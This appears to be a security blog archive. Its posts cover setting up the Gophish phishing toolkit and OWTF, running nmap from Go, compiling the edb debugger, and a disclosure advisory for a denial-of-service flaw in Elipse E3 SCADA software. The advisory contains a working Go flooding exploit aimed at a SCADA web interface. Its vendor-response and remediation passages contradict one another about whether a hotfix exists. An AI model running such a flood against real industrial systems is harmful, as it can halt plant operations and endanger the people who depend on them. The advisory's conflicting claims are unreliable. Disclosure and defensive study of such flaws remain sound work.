Gophish – Golang Open-Source Phishing Toolkit

Environment
Fedora 23 x86_64

Database
sqlite3

Git clone
https://github.com/gophish/gophish.git

additional packages to install
go get github.com/gophish/gophish/config
go get bitbucket.org/liamstask/goose/lib/goose
go get github.com/PuerkitoBio/goquery
go get github.com/gorilla/context
go get github.com/gorilla/mux
go get github.com/gorilla/securecookie
go get github.com/jinzhu/gorm
go get github.com/jordan-wright/email
go get github.com/justinas/nosurf
go get github.com/oschwald/maxminddb-golang
go get golang.org/x/crypto/bcrypt
go get github.com/gorilla/sessions
go get github.com/gorilla/handlers

compile
go build gophish.go
./gophish

Admin interface
http://127.0.0.1:3333/login

Fake site and phishing landing page
http://0.0.0.0:80/

Screenshots

[screenshots: Gophish-Login, Selection_012, Selection_013, Selection_014, Selection_015, Selection_016, Selection_017, Selection_018]

Happy Pentesting!

@firebitsbr

OWTF on KALI 2.0

1. Install KALI 2
2. Upgrade to KALI 2.0
3. cd /opt
4. git clone -b lions_2014 https://github.com/owtf/owtf.git
5. cd /opt/owtf/install
6. chmod u+x install.py
7. pip install cffi --upgrade
8. pip install --upgrade -r /opt/owtf/install/owtf.pip
9. pip install --upgrade beautifulsoup4 lxml Markdown psycopg2 pycurl six
10. ./install.py
11. cd /opt/owtf/profiles/general
12. In default_backtrack.cfg and default.cfg, change the value of TOOL_METASPLOIT_DIR to the actual Metasploit installation directory, which is /usr/share/metasploit-framework/

@firebitsbr

How to run a Windows/DOS binary on Linux (continuation of the previous post about compiling a Windows binary inside Linux)

Continuation of the post:

https://firebitsbr.wordpress.com/2015/08/31/cross-compiling-de-arquivo-em-linguagem-c-compilando-em-linux-executando-em-windows/

To test your Windows binary on Linux itself, as if it were Windows... lol :) (Wine is buggy in the test VM.)

[test@localhost sampler]$ wine cmd
fixme:winediag:start_process Wine Staging 1.7.49 is a testing version containing experimental patches.
fixme:winediag:start_process Please report bugs at http://bugs.wine-staging.com (instead of winehq.org).
Microsoft Windows 5.2.3790 (1.7.49)

Z:\home\test\sampler>fixme:ole:RemUnknown_QueryInterface No interface for iid {00000019-0000-0000-c000-000000000046}
Z:\home\test\sampler>dir
Volume in drive Z has no label.
Volume Serial Number is 0000-0000

Directory of Z:\home\test\sampler

8/31/2015 1:49 PM <DIR> .
8/31/2015 1:45 PM <DIR> ..
8/31/2015 1:15 PM 103 HelloWorld.c
8/31/2015 1:27 PM 67,385 HelloWorld.exe
8/31/2015 10:19 AM 717 HelloWorldCPL.c
8/31/2015 1:35 PM 67,385 HelloWorldCPL01
8/31/2015 1:15 PM 103 HelloWorldCPL01.c
8/31/2015 1:35 PM 67,385 HelloWorldCPL01.cpl
6 files 203,078 bytes
2 directories 95,160,651,776 bytes free
Z:\home\test\sampler>HelloWorldHelloWorld.exe
Sampler Test!

There is no point in using Linux commands now; you are inside Windows.

Z:\home\test\sampler>clear
Can't recognize 'clear' as an internal or external command, or batch script.

Z:\home\test\sampler>exit
[test@localhost sampler]$ clear

I hope this helped!

@firebitsbr

Running nmap via golang

Hi. Another post about golang 😉

I was writing a small Go program to automate running nmap, based on these examples:

https://github.com/mmcgrana/gobyexample/blob/master/examples/spawning-processes/spawning-processes.go
https://gobyexample.com/spawning-processes

It did not work at first, but after some changes I got it running:

[root@localhost golang]# vim go-nmap.go

// Mauro Risonho de Paula Assumpção aka firebits
// mauro.risonho@gmail.com
// example os/exec nmap
// 24.07.2015 15:04:23
// fedora 22 x86-64
// go version go1.4.2 linux/amd64
// go build

package main

import (
	"os"
	"os/exec"
	"syscall"
)

func main() {

	// syscall.Exec needs an absolute path to the binary, so we resolve
	// nmap with exec.LookPath, which searches $PATH and checks that the
	// result is executable.
	binary, lookErr := exec.LookPath("nmap")
	if lookErr != nil {
		panic(lookErr)
	}

	// Exec takes the arguments as a slice (not one big string), and the
	// first element is the program name itself.
	// args := []string{"nmap", "-A", "-O", "127.0.0.1"}
	args := []string{"nmap", "-A", "127.0.0.1"}

	// Exec also needs a set of environment variables; here we pass on
	// the current environment unchanged.
	env := os.Environ()

	// The actual syscall.Exec call. On success this process is replaced
	// by `nmap -A 127.0.0.1` and never returns; on failure we get an error.
	execErr := syscall.Exec(binary, args, env)
	if execErr != nil {
		panic(execErr)
	}
}

I installed a VM with Fedora 22 x86_64 and a CUPS server, and ran a quick scan of localhost (127.0.0.1):

[root@localhost golang]# go build go-nmap.go
[root@localhost golang]# ./go-nmap

Starting Nmap 6.47 ( http://nmap.org ) at 2015-07-24 15:06 BRT
Nmap scan report for localhost.localdomain (127.0.0.1)
Host is up (0.00015s latency).
Not shown: 999 closed ports
PORT STATE SERVICE VERSION
631/tcp open ipp CUPS 2.0
| http-methods: Potentially risky methods: PUT
|_See http://nmap.org/nsedoc/scripts/http-methods.html
| http-robots.txt: 1 disallowed entry
|_/
|_http-title: Home – CUPS 2.0.3
Device type: general purpose
Running: Linux 3.X
OS CPE: cpe:/o:linux:linux_kernel:3
OS details: Linux 3.7 – 3.15
Network Distance: 0 hops

OS and Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.06 seconds

So it works!
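Because syscall.Exec replaces the Go process, the program above cannot do anything with nmap's report. The following added example (not from the original post) runs nmap as a child process with os/exec instead and parses the "PORT STATE SERVICE VERSION" table into Go structs; the SampleOutput constant is constructed from the scan shown above, and ScanHost assumes nmap is on $PATH.

```go
package main

import (
	"os/exec"
	"strings"
)

// OpenPort is one row of nmap's "PORT STATE SERVICE VERSION" table.
type OpenPort struct {
	Port, State, Service, Version string
}

// SampleOutput is a constructed excerpt modelled on the page's scan of 127.0.0.1.
const SampleOutput = "PORT STATE SERVICE VERSION\n631/tcp open ipp CUPS 2.0\n|_http-title: Home - CUPS 2.0.3\nDevice type: general purpose\n"

// ParseNmapPorts extracts port rows from nmap's normal output: rows follow the
// "PORT STATE SERVICE" header, NSE script lines ("|") are skipped, a blank line ends the table.
func ParseNmapPorts(output string) []OpenPort {
	var ports []OpenPort
	inTable := false
	for _, raw := range strings.Split(output, "\n") {
		line := strings.TrimSpace(raw)
		switch {
		case strings.HasPrefix(line, "PORT "):
			inTable = true
			continue
		case !inTable, strings.HasPrefix(line, "|"):
			continue
		case line == "":
			inTable = false
			continue
		}
		f := strings.Fields(line)
		if len(f) < 3 || !strings.Contains(f[0], "/") {
			continue // e.g. "Device type: general purpose" after the table
		}
		ports = append(ports, OpenPort{f[0], f[1], f[2], strings.Join(f[3:], " ")})
	}
	return ports
}

// ScanHost runs nmap as a child process with an explicit argv (no shell), so the
// Go program survives to post-process the output, unlike syscall.Exec above.
func ScanHost(target string) ([]OpenPort, error) {
	out, err := exec.Command("nmap", "-sV", target).Output()
	if err != nil {
		return nil, err
	}
	return ParseNmapPorts(string(out)), nil
}
```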

@firebitsbr

Compiling the edb debugger (open-source visual debugger) on Fedora 20 x86-64

Here it goes:

prerequisite dependencies for the installation:
yum install qt qt-config qt-devel -y

downloading the source code:
wget http://codef00.com/projects/debugger-0.9.20.tgz

extracting:
tar -xvvf debugger-0.9.20.tgz

compiling and installing:
cd debugger/
qmake-qt4
make
make install

running the debugger
edb

[screenshots: f20x86_64-devel-edb, f20x86_64-devel-edb-lightdm]

references:

http://codef00.com/projects
http://www.mentebinaria.com.br/artigos/0x1f/0x1f-maqengrevlnx.html

@firebitsbr

VSLA Security Advisory FIRE-SCADA-DOS-2013-001- Http DoS Requests Flooding Crash Device Vulnerabilities Elipse E3 Scada PLC.

http://seclists.org/fulldisclosure/2014/Jul/69

Http DoS Requests Flooding Crash Device Vulnerabilities Elipse E3 Scada PLC. From: Mauro Risonho de Paula Assumpção
Date: Tue, 15 Jul 2014 12:18:35 -0300

VSLA Security Advisory FIRE-SCADA-DOS-2013-001:
Http DoS Requests Flooding Crash Device Vulnerabilities Elipse E3 Scada PLC.

LEVEL: EXTREME
In our tests, authorized by the customer, we were able to stop the entire plant.

Published: 10/29/2013
Version: 1.0

Vendor: Elipse (http://www.elipse.com.br/port/index.aspx)
Product: Elipse E3 (http://www.elipse.com.br/port/e3.aspx)
Version affected: 3.x and prior

Product description:
Elipse E3 is proprietary software.
The E3 is a system of supervision and control processes designed to meet
the current requirements of connectivity, flexibility and reliability,
making it ideal for use in critical systems (SCADA PLC).

Credit: Mauro Risonho de Paula Assumpção aka firebits

Finding 1: Http DoS Requests Flooding Crash Device Vulnerabilities by
‘index.html’ page.
CVE: CVE-2011-4899

Proof of Concept:
Exploit:

// Exploit Http DoS Request for SCADA ATTACK Elipse 3
// Mauro Risonho de Paula Assumpção aka firebits
// mauro.risonho () gmail com
// 29-10-2013 11:42
// Hard lock Dll crash in Windows 2003 SP2 + 20 requests connections
// exploit in Golang (golang.com) C Google
// Exploit Devel in Fedora:
// sudo yum install golang -y
// go run Http-DoS-Request-SCADA-ATTACK-rev1.go

// Exploit Http-DoS-Request-SCADA-ATTACK-rev1.go
package main

import (
	"fmt"
	"io/ioutil"
	"log"
	"net/http"
)

func main() {
	count := 1
	// fmt.Println("")
	// fmt.Println(" _____.__ ___. .__ __ ")
	// fmt.Println(" _/ ____\__|______ ____\_ |__ |__|/ |_ ______ ")
	// fmt.Println(" \ __\| \_ __ \_/ __ \| __ \| \ __\/ ___/ ")
	// fmt.Println(" | | | || | \/\ ___/| \_\ \ || | \___ \ ")
	// fmt.Println(" |__| |__||__| \___ >___ /__||__| /____ > ")
	// fmt.Println(" \/ \/ \/ ")
	// fmt.Println(" bits on fire. ")
	fmt.Println("Exploit Http DoS Request for SCADA ATTACK Elipse 3")
	fmt.Println("Mauro Risonho de Paula Assumpção aka firebits")
	fmt.Println("29-10-2013 11:42")
	fmt.Println("mauro.risonho () gmail com")
	fmt.Println("Hard lock Dll crash in Windows 2003 SP2 + ")
	fmt.Println("20 requests connections per second")

	for {
		count += count
		// set ip http://192.168.0.1:1681/index.html ->
		// Elipse 3 http://

		fmt.Println("Exploit Http DoS Request for SCADA ATTACK Elipse 3")
		fmt.Println("Mauro Risonho de Paula Assumpção aka firebits")
		fmt.Println("29-10-2013 11:42")
		fmt.Println("mauro.risonho () gmail com")
		fmt.Println("Hard lock Dll crash in Windows 2003 SP2 + ")
		fmt.Println("20 requests connections")

		fmt.Println("Connected Port 1681...Testing")
		fmt.Println("Counter Loops: ", count)

		res, err := http.Get("http://192.168.0.1:1681/index.html")
		if err != nil {
			log.Fatal(err)
		}
		robots, err := ioutil.ReadAll(res.Body)
		res.Body.Close()
		if err != nil {
			log.Fatal(err)
		}
		fmt.Printf("%s", robots)
	}
}

The device crashes after 20 parallel requests.

Vendor Response:
Because the component in question is an installation script, the vendor
has stated that the attack surface is too small to warrant a fix:

"It would be possible for us to communicate the details of the test, so
we can arrange a hotfix."

VSLA Virtual Security Labs Anywhere recommends installing the hotfix
before putting the hardware/software into a production environment.

Remediation Steps:
No official fix for these issues will be released for the Elipse E3.
However, administrators can mitigate these issues by defining rules within
a web application firewall (WAF) solution.
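As an added illustration of the WAF rule the remediation step points at (example code, not part of the advisory), the following Go detector keeps a sliding one-second window per client and flags any source that exceeds the advisory's 20-requests-per-second figure; the client addresses 10.0.0.5 and 10.0.0.7 and the traffic in SampleTraffic are constructed for this example.

```go
package main

import "time"

// Request is one hit on the E3 web interface as a proxy or WAF in front of it would log it.
type Request struct {
	Client string
	At     time.Time
}

// FloodDetector flags a client once it exceeds Threshold requests inside a sliding
// Window, the kind of rule the advisory suggests enforcing in a WAF.
type FloodDetector struct {
	Window    time.Duration
	Threshold int
	history   map[string][]time.Time
}

// Observe records r and reports whether its client is now over the limit.
func (d *FloodDetector) Observe(r Request) bool {
	if d.history == nil {
		d.history = map[string][]time.Time{}
	}
	cutoff := r.At.Add(-d.Window)
	kept := d.history[r.Client][:0] // drop timestamps older than the window, in place
	for _, t := range d.history[r.Client] {
		if t.After(cutoff) {
			kept = append(kept, t)
		}
	}
	d.history[r.Client] = append(kept, r.At)
	return len(d.history[r.Client]) > d.Threshold
}

// SampleTraffic is constructed: 10.0.0.5 sends 25 hits within one second,
// 10.0.0.7 sends 5 hits one second apart (normal operator polling).
func SampleTraffic() []Request {
	base := time.Date(2013, 10, 29, 11, 42, 0, 0, time.UTC)
	var reqs []Request
	for i := 0; i < 25; i++ {
		reqs = append(reqs, Request{"10.0.0.5", base.Add(time.Duration(i) * 20 * time.Millisecond)})
	}
	for i := 0; i < 5; i++ {
		reqs = append(reqs, Request{"10.0.0.7", base.Add(time.Duration(i) * time.Second)})
	}
	return reqs
}
```

Feeding SampleTraffic through a FloodDetector with Window of one second and Threshold 20 flags 10.0.0.5 on its 21st request and never flags 10.0.0.7.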

Vendor Communication Timeline:
10/24/2013 – Vulnerability disclosed
10/29/2013 – Confirmation to release vulnerabilities
? – Advisory published

References
1. http://www.elipse.com.br/port/e3.aspx

About VSLA Virtual Security Labs Anywhere:
VSLA Virtual Security Labs Anywhere is a research blog on information
security.
firebitsbr.wordpress.com

Disclaimer:
The information provided in this advisory is provided “as is” without
warranty of any kind. VSLA Virtual Security Labs Anywhere disclaims all
warranties, either express or implied, including the warranties of
merchantability and fitness for a particular purpose. In no event shall
VSLA Virtual Security Labs Anywhere or its suppliers be liable
for any damages whatsoever including direct, indirect, incidental,
consequential, loss of business profits or special damages, even if
VSLA Virtual Security Labs Anywhere or its suppliers have been advised
of the possibility of such damages. Some states do not allow the
exclusion or limitation of liability for consequential or incidental
damages so the foregoing limitation may not apply.

@firebitsbr